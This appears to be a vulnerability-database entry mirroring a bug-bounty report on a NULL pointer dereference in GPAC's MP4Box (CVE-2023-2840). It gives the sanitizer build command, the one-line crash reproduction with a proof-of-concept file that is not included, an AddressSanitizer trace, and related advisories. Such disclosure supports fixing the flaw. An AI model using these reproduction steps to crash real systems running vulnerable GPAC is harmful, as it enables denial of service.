Lucene search
Cnitlrt21926FC2-6EB1-4E24-8A36-E60F487D0257HistoryMay 18, 2023 - 3:23 a.m.
NULL Pointer Dereference
2023-05-1803:23:25
cnitlrt
www.huntr.dev
6
ubuntu
null pointer dereference
asan
proof of concept
memory access
security bug
0.002 Low
EPSS
Percentile
55.8%
Description
NULL Pointer Dereference In gf_isom_fragment_add_sample_ex isomedia/movie_fragments.c:2883
Environment
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 20.04 LTS
Release: 20.04
Codename: focal
Build
sudo CC=gcc CXX=g++ CFLAGS="-fsanitize=address -static-libasan" CXXFLAGS="-fsanitize=address -static-libasan" LDFLAGS="-fsanitize=address -static-libasan" ./configure && sudo make
Proof of Concept
bin/gcc/MP4Box -dash 1000 ./poc7
ASAN
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent minf
[iso file] Missing DataInformationBox
[iso file] Unknown box type 0000 in parent moov
[iso file] Read Box type 0000 (0x30303030) at position 11542 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
[iso file] Box "moov" (start 20) has 806 extra bytes
[iso file] Unknown top-level box type 0000
[IsoMedia] Track 1 is disabled but single track in file, considering it enabled
[Dasher] No template assigned, using $File$_dash$FS$$Number$
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
[iso file] Unknown box type 0000 in parent moov
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3802899==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fc009a6a74c bp 0x000000000000 sp 0x7fff627f5d40 T0)
==3802899==The signal is caused by a READ memory access.
==3802899==Hint: address points to the zero page.
#0 0x7fc009a6a74b in gf_isom_fragment_add_sample_ex isomedia/movie_fragments.c:2883
#1 0x7fc00a713f83 in mp4_mux_process_sample filters/mux_isom.c:4742
#2 0x7fc00a759cd6 in mp4_mux_process_fragmented filters/mux_isom.c:6391
#3 0x7fc00a759cd6 in mp4_mux_process filters/mux_isom.c:6992
#4 0x7fc00a375c48 in gf_filter_process_task filter_core/filter.c:2894
#5 0x7fc00a31f731 in gf_fs_thread_proc filter_core/filter_session.c:1961
#6 0x7fc00a3378fb in gf_fs_run filter_core/filter_session.c:2263
#7 0x7fc009b96fdb in gf_dasher_process media_tools/dash_segmenter.c:1236
#8 0x55ec636cfcad in do_dash /home/ubuntu/gpac/applications/mp4box/mp4box.c:4825
#9 0x55ec636cfcad in mp4box_main /home/ubuntu/gpac/applications/mp4box/mp4box.c:6236
#10 0x7fc008eff082 in __libc_start_main ../csu/libc-start.c:308
#11 0x55ec63561e9d in _start (/home/ubuntu/gpac/bin/gcc/MP4Box+0x1de9d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV isomedia/movie_fragments.c:2883 in gf_isom_fragment_add_sample_ex
==3802899==ABORTING
Related
debiancve
debiancve
CVE-2023-2840
2023-05-22 18:15:09
ubuntucve
ubuntucve
CVE-2023-2840
2023-05-22 00:00:00
cve
cve
CVE-2023-2840
2023-05-22 18:15:09
prion
prion
Null pointer dereference
2023-05-22 18:15:00
veracode
veracode
NULL Pointer Dereference
2023-05-26 09:28:03
osv
osv
CVE-2023-2840
2023-05-22 18:15:09
gpac - security update
2023-05-26 00:00:00
nvd
nvd
CVE-2023-2840
2023-05-22 18:15:09
cvelist
cvelist
CVE-2023-2840 NULL Pointer Dereference in gpac/gpac
2023-05-22 00:00:00
redos
redos
ROS-20230621-03
2023-06-21 00:00:00
nessus
nessus
Debian DSA-5411-1 : gpac - security update
2023-05-27 00:00:00
openvas
openvas
Debian: Security Advisory (DSA-5411-1)
2023-05-29 00:00:00
debian
debian
[SECURITY] [DSA 5411-1] gpac security update
2023-05-26 14:00:08